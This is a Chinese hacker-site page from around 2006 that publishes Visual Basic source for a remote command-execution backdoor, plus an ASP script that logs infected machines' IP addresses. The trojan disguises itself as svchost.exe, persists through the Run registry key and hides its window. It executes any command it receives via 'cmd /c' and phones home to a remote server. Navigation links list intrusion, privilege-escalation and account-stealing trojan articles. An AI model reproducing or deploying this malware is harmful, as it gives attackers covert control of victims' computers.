·	没有路由密码权限时的鸽	08-23	·	上网安全 Vista自我防范	10-11
·	让濒临崩溃的Windows XP	10-11	·	有备无患，快速自制救急	10-11
·	要你好看!Windows看图工	10-11	·	空间赞助网提供不同类型	10-11
·	讨论net.exe和net1.exe的	10-10	·	让3389远程桌面传输更通	10-10
·	巧妙入侵渗透赌博站	10-10	·	Aspx空间扫权限工具	10-10
·	Windows2003最新提权工具	10-10	·	易淘乐提供100M免费全能	10-10
·	系统开机密码忘了不着急	10-09	·	中意网络提供免费100M免	10-09
·	与众不同 Windows XP开始	10-08	·	让桌面图标翻跟斗在XP上	10-08
·	上海宽元站长资助计划-提	10-08	·	个性化Windows XP的任务	10-07
·	趣盘提供3G免费网络硬盘	10-07	·	秀山热线提供200MB免费全	10-07
·	一次艰辛的提权过程	10-06	·	成功入侵IT大卖场的渗透	10-06
·	mysqlhack- MYSQL利用工	10-06	·	lanker一句话PHP后门客户	10-06
·	WIXI提供3G免费多媒体网	10-06	·	新人网络提供100M/ftp免	10-06
·	如何利用QQ带来高流量	10-05	·	UuShare提供免费网络文件	10-05

[推荐]CMD后门远程执行任意源码

热荐 ★★★★★

CMD后门远程执行任意源码

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2006-4-9 9:29:21

被控制端:

Private Declare Function RegSetValue Lib "advapi32.dll" Alias "RegSetValueA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Const HKEY_LOCAL_MACHINE = &H80000002
Private Const REG_SZ = 1   ’写注册表

Private Sub Form_Load()

’如果自身已经运行则关闭自己
If appprevinstance Then
End
End If

’复制自身
FileCopy App.Path & "\svchost.exe", "C:\windows\svchost.exe"
FileCopy App.Path & "\svchost.dll", "C:\windows\svchost.dll"

  ’启动端口监听
  SockServer.Listen

  Me.SockClient.LocalPort = 1002 ’客户端占用1002端口

  Me.SockClient.RemotePort = 1001 ’连接的远程1001端口

  ’把自己添加到注册表里
  Dim Ret2 As Long
  RegCreateKey HKEY_LOCAL_MACHINE, "software\microsoft\windows\currentVersion\run\", Ret2
  RegSetValue Ret2, vbNullString, REG_SZ, "C:\windows\svchost.exe", 4

  Me.Hide
End Sub
Private Sub SockServer_ConnectionRequest(ByVal requestID As Long)
  ’判断服务器不关闭时接受连接请求
  If SockServer.State <> sckClosed Then SockServer.Close
    SockServer.Accept requestID
End Sub

Private Sub SockServer_DataArrival(ByVal bytesTotal As Long)
  Dim MyGetData As String
  ’得到数据   如果控制端发送来的数据收到了`就放在txt_get.text里面
  SockServer.GetData MyGetData
  If MyGetData = "OPEN" Then   ’请求标志
    SockServer.Close
    SockServer.Listen
  End If
  txt_get.Text = MyGetData

End Sub

Private Sub Timer1_Timer() ’在窗体上加个时钟控件`设置为1000毫秒执行一次也就是一秒

If txt_get.Text <> "0" Then

Shell "cmd /c " & txt_get.Text & ""

txt_get = "0"

End If

End Sub

Private Sub Timer2_Timer() ’获取远程IP地址返回给他IP地址
On Error Resume Next

’读取远程服务器地址
Dim DrText2
  Open App.Path & "\svchost.dll" For Input As #1
  Input #1, Surl
  Close #1
Me.WebBrowser1.Navigate "" & Surl & ""

End Sub

服务器反向连接ASP:

<%
myip=request.ServerVariables("http_x_forwarded_for")
if myip="" then
myip=request.ServerVariables("remote_addr")
end if
response.write""&myip&""
%>

<%
IP=""&myip&""
set fs=server.CreateObject("Scripting.FileSystemObject")
set file=fs.OpenTextFile(server.MapPath("FXIP.txt"),8,True)
file.writeline "远程肉机IP: "+IP
file.close
set file=nothing
set fs=nothing
response.write "---这个肉鸡IP已经成功记录!"
%>

上一页 [1] [2]

文章录入：cainiaowang 责任编辑：cainiaowang

上一篇文章：手把手教你做传奇外挂

下一篇文章： SQL查询语句精华使用简要

【字体：小大】

中介交易区

网游盗号木马实现手记	01-09
黑色技术蠕虫下载者[完整源码]	11-01
利用BCB自己打造QQ炸弹	10-23
从内存中加载并启动一个exe(delp	09-27
开启和关闭Windows xp 防火墙(de	09-27
让你的程序通过XP防火墙(delphi编	09-27
如何让你的程序安全通过windows防	08-20
如何透过程序来控制 Windows (XP	08-20
动易2005-2006算号器的源代码	08-11
API对注册表进行操作(Delphi编程	07-30
一段隐藏注册表项的代码	07-26
了解VB编写病毒的大体方法	07-02